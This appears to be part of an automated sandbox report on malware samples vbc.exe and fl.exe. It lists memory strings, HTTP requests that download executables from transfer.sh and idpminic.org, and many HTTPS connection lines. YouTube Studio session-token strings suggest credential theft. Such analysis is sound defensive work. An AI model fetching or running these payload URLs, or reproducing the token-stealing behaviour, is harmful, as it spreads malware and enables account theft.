Source: vbc.exe, 00000002.00000003.353833961.0000000007D71000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.454517081.0000000006D35000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.355271307.0000000007DF0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.355355297.0000000007E0D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.354438012.0000000007E56000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.353730648.0000000007D54000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.353211198.0000000007C85000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.354312159.0000000007E39000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.353109229.0000000007C68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: vbc.exe, 00000002.00000003.353833961.0000000007D71000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.454517081.0000000006D35000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.355271307.0000000007DF0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.355355297.0000000007E0D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.354438012.0000000007E56000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.353730648.0000000007D54000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.353211198.0000000007C85000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.354312159.0000000007E39000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.353109229.0000000007C68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: vbc.exe, 00000002.00000003.353833961.0000000007D71000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.355355297.0000000007E0D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.354438012.0000000007E56000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.353211198.0000000007C85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: vbc.exe, 00000002.00000003.353833961.0000000007D71000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.454517081.0000000006D35000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.355271307.0000000007DF0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.355355297.0000000007E0D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.354438012.0000000007E56000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.353730648.0000000007D54000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.353211198.0000000007C85000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.354312159.0000000007E39000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.353109229.0000000007C68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: vbc.exe, 00000002.00000002.453478134.0000000006CE2000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.453382772.0000000006CD1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.453073739.0000000006C81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: fl.exe, 0000002B.00000000.421234279.00000000004EF000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://studio.youtube.com
Source: fl.exe, 0000002B.00000000.421234279.00000000004EF000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://studio.youtube.com/reauth
Source: fl.exe, 0000002B.00000000.421234279.00000000004EF000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://studio.youtube.comSAPISIDHASH
Source: fl.exe, 0000002B.00000000.421234279.00000000004EF000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://studio.youtube.comX-Originapplication/jsonContent-TypesessionTokenctx
Source: vbc.exe, 00000002.00000002.452717577.0000000006C53000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://transfer.sh
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.453166123.0000000006C89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://transfer.sh/get/A4YbIY/1607293575.exe
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://transfer.sh/get/frWBuE/123%20%282%29.exe
Source: vbc.exe, 00000002.00000002.452717577.0000000006C53000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://transfer.sh4
Source: vbc.exe, 00000002.00000002.453166123.0000000006C89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://transfer.shD8
Source: vbc.exe, 00000002.00000003.353833961.0000000007D71000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.454517081.0000000006D35000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.355271307.0000000007DF0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.355355297.0000000007E0D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.354438012.0000000007E56000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.353730648.0000000007D54000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.353211198.0000000007C85000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.354312159.0000000007E39000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.353109229.0000000007C68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

DNS traffic detected: queries for: www.idpminic.org

Source: global traffic	HTTP traffic detected: GET /get/frWBuE/123%20%282%29.exe HTTP/1.1Host: transfer.shConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /get/A4YbIY/1607293575.exe HTTP/1.1Host: transfer.sh
Source: global traffic	HTTP traffic detected: GET /aula/dmi1dfg7n.kjylug HTTP/1.1Host: www.idpminic.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aula/ofg7d45fsdfgg312.sfhg HTTP/1.1Host: www.idpminic.org
Source: global traffic	HTTP traffic detected: GET /aula/f429fjd4uf84u.sdfh HTTP/1.1Host: www.idpminic.org

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50131 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 50085 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 50165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50153 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 50095 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50155 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 50143 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 50121 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50151 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50108
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50109
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50100
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50102
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50101
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50104
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50128 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50117
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50116
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50119
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50118
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50111
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50110
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50112
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50115
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50114
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50128
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50127
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50129
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50120
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50122
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50121
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50124
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50123
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50126
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50125
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50081 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50141 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50118 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 50102 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50148 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50067
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown	Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50075
Source: unknown	Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50077
Source: unknown	Network traffic detected: HTTP traffic on port 50114 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50079
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50081
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50083
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50082
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50085
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50084
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50087
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50086
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50089
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50088
Source: unknown	Network traffic detected: HTTP traffic on port 50079 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50092
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50091
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50094
Source: unknown	Network traffic detected: HTTP traffic on port 50136 -> 443
